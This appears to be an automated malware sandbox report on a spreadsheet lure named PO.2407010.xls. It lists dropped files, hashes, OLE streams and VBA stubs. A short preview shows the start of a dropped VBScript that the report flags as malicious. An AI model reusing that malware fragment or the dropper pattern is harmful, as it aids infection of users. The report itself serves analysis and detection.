                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\zkhkrdy0.vht.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\~DF3A3E6A57BE0A74D7.TMP

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):512
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3::
                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                  Malicious:false
                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\~DF5E58BCF8910AC127.TMP

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):512
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3::
                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                  Malicious:false
                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\~DFD0A3A59FB792E47C.TMP

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):512
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3::
                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                  Malicious:false
                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck

                                                                                                  Download File
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171

                                                                                                  Download File
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):46
                                                                                                  Entropy (8bit):1.0424600748477153
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:/lbWwWl:sZ
                                                                                                  MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                                                                                  SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                                                                                  SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                                                                                  SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                                                                                  Malicious:false
                                                                                                  Preview:........................................user.

                                                                                                  C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):141910
                                                                                                  Entropy (8bit):3.6703425717520406
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:eirfggt5pzOGwjqSxVj51Dis9CifP9+z0xG11E6SMWxJRX:eir4gt5pKGwDzjbDislfl+nKMYJRX
                                                                                                  MD5:64CC9748329C0E186CACD10D639615E6
                                                                                                  SHA1:1291F245B185BD05FB09646B79F284D76E7DC0FF
                                                                                                  SHA-256:2C5FFFA8231F572E3A34B8D4CA675AEC062C3ACCFE661519A28E376605C0479D
                                                                                                  SHA-512:65CCBFE0223B58675AEF7DE997229F3BA66BE892C851D6CEC9018B941F3A5C5CAC3C41FBE1878474213293AD25059B06E7FF7F0C4E3320D75A6FA7F071B646BA
                                                                                                  Malicious:true
                                                                                                  Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.n.t.r.o.v.i.s.c.a.d.a.)..... . . . .d.i.m. .p.e.l.o.t.a.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .p.e.l.o.t.a..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .p.e.l.o.t.a.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.r.o.x.

                                                                                                  C:\Users\user\Desktop\20430000

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Oct 30 07:04:39 2024, Security: 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):479232
                                                                                                  Entropy (8bit):7.972118840457996
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:qyy0QUKmi90k8p4Yogt1sCOsOw4fJJt23XjKx8:Ly0dd6gMRsOwyoe
                                                                                                  MD5:AD0FEB963BAE9D7324B26C01790BE1EE
                                                                                                  SHA1:9AB979498236DA613FAAB21285BC46E643CCB171
                                                                                                  SHA-256:BC68CEB774BD130C6434BB4374FD8A95C0978D8041F2E179EF5EDE773B3C6A21
                                                                                                  SHA-512:810DAEBB20DF73E1072B0EB8BF2E4B0FA9E6B455C342402B20C301DFF080B3B2D3292E12B593A4168ACF11B2BE30AFD6CB10EB4A43F130918F155AF760490211
                                                                                                  Malicious:false
                                                                                                  Preview:......................>...................................-...................p.......r.......t.......v................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,.........../.......Q...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...0...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...q.......r...s...t...u...v...w...x...y...z...

                                                                                                  C:\Users\user\Desktop\20430000:Zone.Identifier

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26
                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                  Malicious:false
                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                  C:\Users\user\Desktop\PO.2407010.xls (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Oct 30 07:04:39 2024, Security: 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):479232
                                                                                                  Entropy (8bit):7.972118840457996
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:qyy0QUKmi90k8p4Yogt1sCOsOw4fJJt23XjKx8:Ly0dd6gMRsOwyoe
                                                                                                  MD5:AD0FEB963BAE9D7324B26C01790BE1EE
                                                                                                  SHA1:9AB979498236DA613FAAB21285BC46E643CCB171
                                                                                                  SHA-256:BC68CEB774BD130C6434BB4374FD8A95C0978D8041F2E179EF5EDE773B3C6A21
                                                                                                  SHA-512:810DAEBB20DF73E1072B0EB8BF2E4B0FA9E6B455C342402B20C301DFF080B3B2D3292E12B593A4168ACF11B2BE30AFD6CB10EB4A43F130918F155AF760490211
                                                                                                  Malicious:true
                                                                                                  Preview:......................>...................................-...................p.......r.......t.......v................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,.........../.......Q...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...0...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...q.......r...s...t...u...v...w...x...y...z...

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Oct 30 04:53:35 2024, Security: 1
                                                                                                  Entropy (8bit):7.948225376650044
                                                                                                  TrID:
                                                                                                  • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                  File name:PO.2407010.xls
                                                                                                  File size:487'936 bytes
                                                                                                  MD5:28795274503d8d74d85408746a7d1def
                                                                                                  SHA1:151fb154f9c1eb44528b2b221279e1a242f9c4cc
                                                                                                  SHA256:d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683
                                                                                                  SHA512:d34d5c24e0fa7fd7f798b072c24a0fe337ddafd5741e6d59ea784e2b431db0c7512221ad7eedaed0143bc9f5ca8b35b1856dae800cfc8666bf29aea6e026cc8d
                                                                                                  SSDEEP:12288:WPZLLFNkUxNgdoDKeu0VlFjbd/eAm94L8nn:4L/Vxqdoa0V7d/e0
                                                                                                  TLSH:13A4221374ACCA2BE95BA77D2DF04476415ABC840FE1F64F3A0B372B5478B81845F2A8
                                                                                                  File Content Preview:........................>...................................-...................p.......r.......t.......v......................................................................................................................................................

                                                                                                  File Icon

                                                                                                  Icon Hash:276ea3a6a6b7bfbf

                                                                                                  Static OLE Info

                                                                                                  General

                                                                                                  Document Type:OLE
                                                                                                  Number of OLE Files:1

                                                                                                  OLE File "PO.2407010.xls"

                                                                                                  Indicators
                                                                                                  Has Summary Info:
                                                                                                  Application Name:Microsoft Excel
                                                                                                  Encrypted Document:True
                                                                                                  Contains Word Document Stream:False
                                                                                                  Contains Workbook/Book Stream:True
                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                  Contains Visio Document Stream:False
                                                                                                  Contains ObjectPool Stream:False
                                                                                                  Flash Objects Count:0
                                                                                                  Contains VBA Macros:True
                                                                                                  Summary
                                                                                                  Code Page:1252
                                                                                                  Author:
                                                                                                  Last Saved By:
                                                                                                  Create Time:2006-09-16 00:00:00
                                                                                                  Last Saved Time:2024-10-30 04:53:35
                                                                                                  Creating Application:Microsoft Excel
                                                                                                  Security:1
                                                                                                  Document Summary
                                                                                                  Document Code Page:1252
                                                                                                  Thumbnail Scaling Desired:False
                                                                                                  Contains Dirty Links:False
                                                                                                  Shared Document:False
                                                                                                  Changed Hyperlinks:False
                                                                                                  Application Version:786432

                                                                                                  Streams with VBA

                                                                                                  VBA File Name: Sheet1.cls, Stream Size: 977
                                                                                                  General
                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                  VBA File Name:Sheet1.cls
                                                                                                  Stream Size:977
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k V . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 6b 56 92 d5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  VBA Code
                                                                                                  Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                  VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                                  General
                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                  VBA File Name:Sheet2.cls
                                                                                                  Stream Size:977
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k V _ [ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 6b 56 5f 5b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  VBA Code
                                                                                                  Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                  VBA File Name: Sheet3.cls, Stream Size: 977
                                                                                                  General
                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                  VBA File Name:Sheet3.cls
                                                                                                  Stream Size:977
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k V D . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 6b 56 44 f9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  VBA Code
                                                                                                  Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                  VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                                  General
                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                  VBA File Name:ThisWorkbook.cls
                                                                                                  Stream Size:985
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k V . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 6b 56 ff 10 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  VBA Code
                                                                                                  Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                  Streams

                                                                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                  General
                                                                                                  Stream Path:\x1CompObj
                                                                                                  CLSID:
                                                                                                  File Type:data
                                                                                                  Stream Size:114
                                                                                                  Entropy:4.25248375192737
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                                  General
                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                  CLSID:
                                                                                                  File Type:data
                                                                                                  Stream Size:244
                                                                                                  Entropy:2.889430592781307
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                                  General
                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                  CLSID:
                                                                                                  File Type:data
                                                                                                  Stream Size:200
                                                                                                  Entropy:3.3020681057018666
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . * . . . . . . . . .
                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                  Stream Path: MBD011FA3F0/\x1CompObj, File Type: data, Stream Size: 99
                                                                                                  General
                                                                                                  Stream Path:MBD011FA3F0/\x1CompObj
                                                                                                  CLSID:
                                                                                                  File Type:data
                                                                                                  Stream Size:99
                                                                                                  Entropy:3.631242196770981
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Stream Path: MBD011FA3F0/Package, File Type: Microsoft Excel 2007+, Stream Size: 21079
                                                                                                  General
                                                                                                  Stream Path:MBD011FA3F0/Package
                                                                                                  CLSID:
                                                                                                  File Type:Microsoft Excel 2007+
                                                                                                  Stream Size:21079
                                                                                                  Entropy:7.699462855468023
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Stream Path: MBD011FA3F1/\x1Ole, File Type: data, Stream Size: 776
                                                                                                  General
                                                                                                  Stream Path:MBD011FA3F1/\x1Ole
                                                                                                  CLSID:
                                                                                                  File Type:data
                                                                                                  Stream Size:776
                                                                                                  Entropy:4.941423536022305
                                                                                                  Base64 Encoded:False
